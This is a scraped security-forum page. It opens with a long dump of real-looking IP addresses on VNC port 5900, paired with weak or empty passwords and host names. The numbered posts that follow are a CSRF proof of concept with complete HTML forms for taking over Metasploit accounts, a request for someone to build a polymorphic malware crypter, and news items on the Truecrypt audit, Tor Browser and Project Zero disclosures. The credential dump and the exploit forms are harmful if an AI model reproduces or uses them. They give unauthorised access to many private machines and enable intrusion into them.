81.182.207.102:5900-1234-[WLGHUN10-BPHUT4] 81.192.101.124:5900-1234-[BUR140] 81.192.101.15:5900-1234-[BUR006] 81.218.191.1:5900-1234-[None] 81.218.152.62:5900-1234-[king@king-desktop] 81.235.158.185:5900-1234-[E1071] 81.245.51.62:5900-1234-[None] 81.246.250.200:5900-1234-[titanium ( 192.168.1.100 )] 81.248.174.88:5900-1234-[cvabym01 ( 192.168.1.11 )] 81.249.169.249:5900-1234-[GIGA4] 52.16.95.150:5900-12345-[None] 52.0.57.238:5900-12345-[IP-C0A898FD Microsoft Windows Server 2008 R2 Datacenter Edition Service Pack 1 (build 7601), 64-bit] 81.4.234.218:5900-12345-[borodulin’s Mac mini] 81.18.192.178:5900-12345-[MININT-9EE8VS5 Microsoft Windows 7 Professional Service Pack 1 (build 7601), 64-bit] 81.10.237.109:5900-12345-[Martins Mac mini] 81.136.247.116:5900-12345-[evigilo12337] 81.142.114.213:5900-12345-[NoiseMonitoringServer’s Mac mini] 81.142.114.208:5900-12345-[None] 81.142.114.211:5900-12345-[None] 81.142.114.209:5900-12345-[None] 81.142.114.214:5900-12345-[None] 81.142.114.215:5900-12345-[None] 81.142.114.210:5900-12345-[None] 81.142.114.212:5900-12345-[None] 81.219.141.230:5900-12345-[SRV-SB-WIESZ] 81.218.123.30:5900-12345-[apollo] 52.10.12.25:5900-123456-[WIN-LESQVADBMRU] 81.34.214.83:5900-123456-[DLR4-16 [000322120f40]] 81.44.68.7:5900-123456-[tpv004 ( 192.168.1.100 )] 81.82.240.218:5900-123456-[hpz220 ( 192.168.0.102 ) - service mode] 81.133.189.12:5900-123456-[aboutface1 ( 192.168.1.1 )] 81.153.186.122:5900-123456-[ucs160310] 81.200.27.43:5900-123456-[Encelad] 81.169.142.199:5900-1234567-[h2318994 ( 81.169.142.199 ) - service mode] 81.192.48.243:5900-null-[None] 81.32.168.98:5900-12345678-[DLR-2116 [000322162fbd]] 81.95.137.206:5900-12345678-[lift2 ( 81.95.137.206, 192.168.0.189 ) - service mode] 81.177.224.140:5900-12345678-[manager ( 192.168.0.108 ) - service mode] 81.182.26.218:5900-1234567890-[gertasrv ( 192.168.1.190 )] 81.253.43.3:5900-1234567890-[portable-or ( 172.17.105.170 )] 81.106.220.146:5900-password1-[James’s iMac] 81.80.209.132:5900-password1-[None] 81.140.83.142:5900-password1-[WinCEVNC] 81.142.228.102:5900-password1-[None] 81.149.26.104:5900-password1-[sqlserver ( 192.168.10.99 )] 81.174.169.5:5900-password1-[E1151] 81.193.157.38:5900-password1-[None] 81.255.31.88:5900-password1-[pc-de-stasdd ( 192.168.1.13 ) - service mode] 81.149.214.214:5900-password01-[2KSERVER] 81.211.17.70:5900-pass1-[VEEX V300 Series VNC Server] 81.30.136.215:5900-admin-[kasa ( 192.168.0.10 ) - service mode] 81.83.30.223:5900-admin-[Fileserver] 81.93.249.190:5900-admin-[OM20-81-93-249-190] 81.143.8.77:5900-admin-[Turtle’s Mac mini] 81.174.14.107:5900-admin-[casartelli-pc ( 192.58.3.235, 192.58.4.235 ) - service mode] 81.82.224.41:5900-P@ssword-[None] 81.82.237.60:5900-P@ssword-[veeam] 81.83.0.152:5900-P@ssword-[backup] 81.133.161.166:5900-P@ssword-[None] 81.240.252.89:5900-P@ssword-[None] 81.38.161.168:5900-qwerty123-[svrppv ( 192.168.30.2 )] 81.44.45.176:5900-qwerty123-[svrppv ( 192.168.34.2 )] 81.168.172.172:5900-qwerty-[mar-f370d6790f8 ( 192.168.240.99 )] 81.148.17.41:5900-remote-[Mark’s iMac] 81.168.90.243:5900-remote-[None] 81.203.6.253:5900-system-[altillo ( 192.168.1.11 ) - service mode] 24.29.173.112:5900-null-[eve@eve-1005HA] 24.24.26.118:5900-test-[headsup1] 81.83.13.201:5900-test-[xserve] 81.137.254.231:5900-hello123-[elleeshd1 ( 192.168.1.95 ) - service mode] 81.233.79.15:5900-support-[81-233-79-15-no73.business.telia.com:0] 81.233.79.192:5900-support-[81-233-79-192-no73.business.telia.com:0] 81.27.123.4:5900-master-[VC Project 'visu'] 81.43.111.240:5900-master-[VC Project 'visu'] 81.137.235.204:5900-master-[VC Project 'visu'] 81.159.79.102:5900-master-[BR06] 81.164.186.182:5900-master-[BR06] 81.169.139.211:5900-master-[VC Project 'visu'] 81.174.239.18:5900-master-[BR06] 81.174.239.19:5900-master-[BR06] 81.174.228.65:5900-master-[VC Project 'visu'] 81.243.240.92:5900-master-[VC Project 'visu'] 81.242.239.84:5900-master-[VC Project 'visu'] 81.245.232.82:5900-master-[VC Project 'visu'] 81.245.62.40:5900-master-[BR06] 81.246.204.78:5900-master-[BR06] 81.152.195.110:5900-letmein-[nigel@MUSIC] 81.82.234.116:5900-null-[None] 24.8.213.188:5900-apple-[17inch] 81.26.152.173:5900-111111-[ulu ( 10.10.0.175, 10.10.0.60, 81.26.152.173 ) - service mode] 81.82.240.39:5900-111111-[x0vncserver] 81.133.215.254:5900-111111-[T7A] 81.137.202.219:5900-pa55word-[macmini server] 81.174.165.102:5900-pa55word-[Colophon Server] 81.234.254.138:5900-null-[None] 88.2.196.195:5900-null-[None] 88.0.247.182:5900-null-[Cubie:0.0] 88.2.235.169:5900-null-[None] 88.5.23.112:5900-null-[QEMU] 88.12.13.187:5900-null-[Device 10001] 88.12.5.96:5900-null-[Device 10001] 88.12.44.45:5900-null-[Device 10001] 88.12.152.95:5900-null-[QEMU] 46.229.153.82:5900-null-[x11] 88.14.143.89:5900-null-[FORMACION3] 88.14.100.165:5900-null-[QEMU] 88.14.111.235:5900-null-[QEMU] 88.14.121.18:5900-null-[QEMU] 79.143.179.236:5900-null-[QEMU (static-farmmania)] 37.123.140.247:5900-null-[None] 78.70.20.118:5900-null-[x11] 37.123.141.88:5900-null-[None] 78.70.192.224:5900-null-[None] 37.123.186.100:5900-null-[None] 130.237.67.12:5900-null-[bajibabu@fant] 88.7.75.115:5900-null-[bfa@MicroServer] 79.143.161.228:5900-null-[tuco@dnevna] 212.116.80.42:5900-null-[None] 85.30.34.137:5900-null-[None] 85.30.55.0:5900-null-[None] 85.30.60.206:5900-null-[None] 85.30.154.152:5900-null-[None] 85.30.155.162:5900-null-[None] 213.66.136.156:5900-null-[None] 213.66.136.32:5900-null-[None] 85.30.57.208:5900-null-[None] 193.13.110.248:5900-null-[None] 193.13.36.238:5900-null-[None] 195.19.76.233:5900-null-[QEMU (rosabs3-abf-worker1)] 178.78.60.68:5900-1-[rk7server ( 192.168.0.99 ) - service mode] 5.133.132.127:5900-1-[None] 130.237.25.250:5900-null-[None] 121.8.202.84:5900-1-[gdeie1703160] 121.6.151.139:5900-1-[nlbugis-pc ( 192.168.1.100 )] 121.12.120.72:5900-null-[QEMU (we5dg)] 121.14.195.68:5900-null-[Xen-cms] 121.1.198.99:5900-null-[wavecast@wavecast-01] 128.2.90.39:5900-null-[None] 128.2.144.215:5900-null-[student@kali1] 128.2.144.136:5900-null-[student@kali1] 128.2.144.139:5900-null-[student@kali1] 128.2.144.138:5900-null-[student@kali1] 128.2.144.140:5900-null-[student@kali1] 128.6.17.244:5900-null-[Device 10002] 128.9.233.14:5900-null-[QEMU (instance-00000422)] 128.9.233.16:5900-null-[QEMU (instance-000000b5)] 128.9.233.18:5900-null-[QEMU (instance-000000b3)] 128.9.233.11:5900-null-[QEMU (instance-00000423)] 128.9.233.13:5900-null-[QEMU (instance-00000426)] 128.9.233.12:5900-null-[QEMU (instance-0000029b)] 128.2.214.34:5900-null-[None] 128.2.245.163:5900-null-[None] 128.2.245.165:5900-null-[None] 128.2.245.161:5900-null-[None] 128.6.17.243:5900-null-[None] 128.2.144.135:5900-null-[student@kali1] 88.12.42.82:5900-123-[DEHESASERVER] 187.58.122.9:5900-123-[svr01 ( 192.168.25.201 ) - service mode] 95.31.221.127:5900-123-[guestmsk] 121.8.181.165:5900-123-[gaoke-9pdwfvlke] 121.13.219.5:5900-123-[cpo-mis-5815] 95.31.137.96:5900-123-[maksimov@x01-policase-prod] 121.17.52.72:5900-123-[pc-20100901yzle] 88.2.222.98:5900-1234-[None] 88.3.119.122:5900-1234-[None] 78.70.14.226:5900-1234-[EXTER T40m] 5.228.58.178:5900-1234-[None] 121.6.181.205:5900-1234-[mah_pms ( 192.168.22.4 ) - application mode] 121.7.152.30:5900-1234-[d946gz ( 192.168.3.50 ) - application mode] 121.6.165.191:5900-1234-[d946gz ( 192.168.20.50 ) - application mode] 88.12.48.199:5900-12345-[WinVNC] 88.10.113.245:5900-12345-[Minerva Mac Server] 130.236.136.28:5900-12345-[None] 187.58.126.213:5900-12345-[SERVIDOR Microsoft Windows Server 2003 R2, Enterprise Edition Service Pack 2 (build 3790)] 128.8.138.146:5900-12345-[Julie Berry’s iMac] 212.116.173.41:5900-123456-[None] 212.116.173.42:5900-123456-[None] 81.200.27.43:5900-123456-[Encelad] 121.12.167.104:5900-123456-[OTHER] 107.6.13.189:5900-123456-[QEMU (WIN)] 107.6.44.202:5900-123456-[win-62fghkhguos ( 10.10.20.6, 107.6.44.202, 169.254.235.96 ) - service mode] 88.11.135.233:5900-12345678-[DVR [000322091864]] 121.6.146.222:5900-12345678-[posready7-pc ( 121.6.146.222, 192.168.1.1, 192.168.192.1 ) - service mode] 121.6.146.222:5900-1234567890-[posready7-pc ( 121.6.146.222, 192.168.1.1, 192.168.192.1 ) - service mode] 116.88.94.171:5900-0000-[server’s Mac mini] 95.215.99.206:5900-0000-[LKDS-ÏÊ] 79.143.81.46:5900-q1w2e3-[None] 88.0.26.187:5900-qwerty123-[svrppv ( 192.168.31.1 )] 88.5.181.31:5900-qwerty123-[srvppv ( 192.168.1.2, 192.168.25.60, 192.168.25.61 ) - service mode] 88.3.164.90:5900-qwerty123-[svrppv ( 192.168.17.1 )] 88.11.80.10:5900-qwerty123-[svrppv ( 192.168.37.1 )] 88.13.1.162:5900-qwerty123-[svrppv ( 192.168.10.1 )] 88.13.4.146:5900-qwerty123-[svrppv ( 192.168.28.1 )] 88.13.73.144:5900-qwerty123-[svrppv ( 192.168.60.1 )] 88.13.9.8:5900-qwerty123-[svrppv ( 192.168.18.2 )] 88.13.52.137:5900-qwerty123-[svrppv ( 192.168.13.1 )] 88.12.67.68:5900-qwerty123-[svrppv ( 192.168.25.1 )] 88.13.3.176:5900-qwerty123-[svrppv ( 192.168.61.2 )] 88.3.162.166:5900-qwerty123-[None] 88.13.62.54:5900-remote-[compaq] 128.2.75.121:5900-test-[Jim Hawthorne’s iMac] 121.7.222.155:5900-support-[None] 88.12.54.153:5900-master-[VC Project 'visu'] 107.6.13.71:5900-abc123-[QEMU (1066-eh-web1)]
  8. # Exploit Title: Metasploit Project initial User Creation CSRF # Google Dork: N/A # Date: 14-2-2015 # Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh) # Vendor Homepage: http://www.metasploit.com/ # Software Link: http://www.rapid7.com/products/metasploit/editions-and-features.jsp # Version: Free/Pro < 4.11.1 (Update 2015021901) # Tested on: All OS # CVE : N/A Vulnerability: Cross Site Request Forgery - (CSRF) Info: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) More Details: After doing some research, i have found that the anti csrf token "authenticity_token" value is not validated from the local server side which will result in a more csrf attack scenario around the whole local metasploit project. Affected URL(s)/PoC Code(s): -Change Local Metasploit Project User Settings <html> <body> <form action="https://127.0.0.1:3790/users/1" method="POST"> <input type="hidden" name="utf8" value="?" /> <input type="hidden" name="_method" value="put" /> <input type="hidden" name="authenticity_token" value="" /> <input type="hidden" name="user[fullname]" value="Attacker" /> <input type="hidden" name="user[email]" value="EMAIL" /> <input type="hidden" name="user[company]" value="COMPANY" /> <input type="hidden" name="user[time_zone]" value="Cairo" /> <input type="hidden" name="commit" value="Save Settings" /> <input type="submit" value="Submit form" /> </form> </body> </html> -Full Local Metasploit Project Account Takeover before setting up the first user settings <html> <body> <form action="https://127.0.0.1:3790/users" method="POST"> <input type="hidden" name="utf8" value="?" /> <input type="hidden" name="authenticity_token" value="" /> <input type="hidden" name="user[username]" value="Username" /> <input type="hidden" name="user[password]" value="PASSWORD" /> <input type="hidden" name="user[password_confirmation]" value="PASSWORD" /> <input type="hidden" name="user[fullname]" value="FUll_Name" /> <input type="hidden" name="user[email]" value="EMAIL" /> <input type="hidden" name="user[company]" value="COMPANY" /> <input type="hidden" name="user[time_zone]" value="Cairo" /> <input type="hidden" name="commit" value="Create Account" /> <input type="submit" value="Submit form" /> </form> </body> </html> More Details/Impact: -Change Local Metasploit Project User Settings -Full Local Metasploit Project Account Takeover before setting up the first user settings Report Timeline: [-] 14/02/2015: Reported to Rapid7 Security Team [-] 14/02/2015: Initial Reply from HD Moore acknowledging the vulnerability [-] 17/02/2015: Reply from "Eray Yilmaz" about the Operation and public disclosure rules [-] 20/02/2015: Reply from "Eray Yilmaz" about releasing a patch for the vulnerability in place, Fixed in Update 4.11.1 (Update 2015021901), https://community.rapid7.com/docs/DOC-3010 [-] 16/03/2015: Public Disclosure Thanks -- *Best Regards**,**,* *Mohamed Abdelbaset Elnoby*Guru Programmer, Information Security Evangelist & Bug Bounty Hunter. LinkedIn <https://www.linkedin.com/in/symbiansymoh>Curriculum Vitae <http://goo.gl/cNrVpL> <https://www.linkedin.com/in/symbiansymoh>Facebook <https://fb.com/symbiansymoh>Twitter <https://twitter.com/symbiansymoh> Source
  9. There's a story on Hacker News asking what the hell is going on with the Truecrypt audit. I think that's a fair question, since we have been awfully quiet lately. To everyone who donated to the project, first accept my apologies for the slow pace. I want to promise you that we're not spending your money on tropical vacations (as appealing as that would be). In this post I'd like to offer you some news, including an explanation of why this has moved slowly. For those of you who don't know what the Truecrypt audit is: in late 2013 Kenn White, myself, and a group of advisors started a project to undertake a crowdfunded audit of the Truecrypt disk encryption program. To the best of my knowledge, this is the first time anyone's tried this. The motivation for the audit is that lots of people use Truecrypt and depend on it for their security and safety -- yet the authors of the program are anonymous and somewhat mysterious to boot. Being anonymous and mysterious is not a crime, but it still seemed like a nice idea to take a look at their code. We had an amazing response, collecting upwards of $70,000 in donations from a huge and diverse group of donors. We then went ahead and retained iSEC Partners to evaluate the bootloader and other vulnerability-prone areas of Truecrypt. The initial report was published here. That initial effort was Part 1 of a two-part project. The second -- and much more challenging part -- involves a detailed look at the cryptography of Truecrypt, ranging from the symmetric encryption to the random number generator. We had some nice plans for this, and were well on our way to implementing them. (More on those in a second.) Then in late Spring of 2014, something bizarre happened. The Truecrypt developers pulled the plug on the entire product -- in their typical, mysterious way. This threw our plans for a loop. We had been planning a crowdsourced audit to be run by Thomas Ptacek and some others. However in the wake of TC pulling the plug, there were questions. Was this a good use of folks' time and resources? What about applying those resources to the new 'Truecrypt forks' that have sprung up (or are being developed?) There were a few other wrinkles as well, which Thomas talks about here -- although he takes on too much of the blame. It took us a while to recover from this and come up with a plan B that works within our budget and makes sense. We're now implementing this. A few weeks ago we signed a contract with the newly formed NCC Group's Cryptography Services practice (which grew out of iSEC, Matasano and Intrepidus Group). The project will evaluate the original Truecrypt 7.1a which serves as a baseline for the newer forks, and it will begin shortly. However to minimize price -- and make your donations stretch farther -- we allowed the start date to be a bit flexible, which is why we don't have results yet. In our copious spare time we've also been looking manually at some portions of the code, including the Truecrypt RNG and other parts of the cryptographic implementation. This will hopefully complement the NCC/iSEC work and offer a bit more confidence in the implementation. I don't really have much more to say -- except to thank all of the donors for their contributions and their patience. This project has been a bit slower than any of us would like, but results are coming. Personally, my hope is that they'll be completely boring. Sursa: A Few Thoughts on Cryptographic Engineering: Another update on the Truecrypt audit
  10. Tor — a privacy oriented encrypted anonymizing service, has announced the launch of its next version of Tor Browser Bundle, i.e. Tor version 4.0.4, mostly supposed to improve the built-in utilities, privacy and security of online users on the Internet. Tor Browser helps users to browse the Internet in a complete anonymous way. The powerful Tor Browser Bundle, an anonymous web browser developed by the Tor Project, received some updates in its software. Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox configured to protect the users’ anonymity via Tor and Vidalia. The anonymity suite also includes 3 Firefox extensions: Torbutton, NoScript and HTTPS-Everywhere. NEW FEATURES The latest version, Tor Browser Bundle 4.0.4, has been recently released, with a few number of new features: Updated to Firefox to 31.5.0esr with important security updates. Update OpenSSL to 1.0.1 Update NoScript to 2.6.9.15 Update HTTPS-Everywhere to 4.0.3 BUG FIXES Meanwhile, the new Tor version 4.0.4 also include some bugfixes: Bug 14203: Prevent meek from displaying an extra update notification Bug 14849: Remove new NoScript menu option to make permissions permanent Bug 14851: Set NoScript pref to disable permanent permissions "A new release for the stable Tor Browser is available from the Tor Browser Project page and also from our distribution directory," states the Tor project team. Tor is generally thought to be a place where users come online to hide their activities and remain anonymous. Tor is an encrypted anonymizing network considered to be one of the most privacy oriented service and is mostly used by activists, journalists to circumvent online censorship and surveillance efforts by various countries. However, late last year we have seen large scale cyber attack on Tor network that quietly seized some of its network specialized servers called Directory Authorities (DA), the servers that help Tor clients to find Tor relays in the anonymous network service. On the other end of the side, last month 12 high-capacity Tor Middle relays was launched by the Polaris — a new initiative by Mozilla, the Tor Project and the Center of Democracy and Technology — in order to help build more privacy controls into technology. The addition of high-capacity Tor middle relays to the Tor network helps reduce finite number of Tor connections occurring at the same time. -> Sursa <-
  11. Trey Ford from Project Sonar describes the group’s initiative at Kaspersky’s Security Analyst Summit. The Rapid7 service scans public networks for applications, software, and hardware, then analyzes that cache of information to learn trends and gain insight on common vulnerabilities. Source
  12. Hi, i'm looking for a strong "Ninja" to develop a polymorphic crypter in C++/ASM. if you have the knowledge & experience and interesting in such a project, please PM me: quantommachine@yahoo.com
  13. Update: OK Apple, your turn. After raising a ruckus with the disclosure of three unpatched Windows vulnerabilities, Google’s Project Zero research team did the same this week with a trio of security issues in Apple OS X. Project Zero imposes a 90-day deadline on vulnerabilities it reports to affected vendors; if a patch is not delivered inside that time frame, details are automatically made public via its external database. The respective OS X bugs were reported to Apple in late October and 90-day deadlines began expiring this week. The Project Zero disclosures also come with proof-of-concept exploit code. A request for comment from Apple was not returned in time for publication. Published reports indicate that the vulnerabilities have been patched in Yosemite 10.10.2, which is in beta. The vulnerabilities affect different components of Apple’s flagship operating system, and range from memory corruption, kernel code execution and a sandbox escape. All three require some kind of local access to exploit. The sandbox escape vulnerability, OS X networkd “effective_audit_token” XPC type confusion sandbox escape as labeled by Google, may have been mitigated starting in the Yosemite version of OS X. Google refers to a separate advisory for those details. In its disclosure on Tuesday, Google said that the networkd system daemon implements an XPC service API which communicates on behalf of an application. Project Zero said that XPC messages using get parameters are used without checking the type of returned value. This allows messages to reach functions outside the sandbox, Google said. One day later, the 90-day deadline expired on an OS X IOKit kernel execution vulnerability. “Calling IOConnectMapMemory on userclient type 2 of “IntelAccelerator” with memory type 3 hits an exploitable kernel NULL pointer dereference calling a virtual function on an object at 0x0,” Google said in its advisory. Part of this disclosure originally included a kernel ASLR bypassed, but that was patched in Yosemite 10.10, Google said. The third disclosure happened yesterday and is another OS X IOKit kernel memory corruption vulnerability. Google said a Bluetooth device must be connected to exploit this bug, which is due to a bad bzero in IOBluetoothDevice. “Userspace can modify the size in shared memory leading to the bzero writing a controlled number of NULL bytes off the end of the buffer,” the advisory said. Project Zero’s automated disclosures are the latest salvo in the industry’s eternal debate over the sharing and distribution of vulnerability details. Microsoft fought back after Google spilled the beans on a trio of its unpatched bugs, one of which Google refused to sit on for an additional two days before Microsoft was to release a patch. Source
  14. Don't look now, but Google's Project Zero vulnerability research program may have dropped more zero-day vulnerabilities—this time on Apple's OS X platform. In the past two days, Project Zero has disclosed OS X vulnerabilities here, here, and here. At first glance, none of them appear to be highly critical, since all three appear to require the attacker to already have some access to a targeted machine. What's more, the first vulnerability, the one involving the "networkd 'effective_audit_token' XPC," may already have been mitigated in OS X Yosemite, but if so the Google advisory doesn't make this explicit and Apple doesn't publicly discuss security matters with reporters. Still, the exploits could be combined with a separate attack to elevate lower-level privileges and gain control over vulnerable Macs. And since the disclosures contain proof-of-concept exploit code, they provide enough technical detail for experienced hackers to write malicious attacks that target the previously unknown vulnerabilities. The security flaws were privately reported to Apple on October 20, October 21, and October 23, 2014. All three advisories appear to have been published after the expiration of the 90-day grace period Project Zero gives developers before making reports public. Assuming the vulnerabilities remain active in at least some versions of OS X, it wouldn't be the first time Project Zero has gone against a developer's wishes and made unfixed security bugs known to the whole world. The Google-backed program has already published three unpatched vulnerabilities in Windows. Source
  15. Automater is a tool that I originally created to automate the OSINT analysis of IP addresses. It quickly grew and became a tool to do analysis of IP Addresses, URLs, and Hashes. Unfortunately though, this was my first python project and I made a lot of mistakes, and as the project grew it bacame VERY hard for me to maintain. Download: https://github.com/1aN0rmus/TekDefense-Automater
×
×
  • Create New...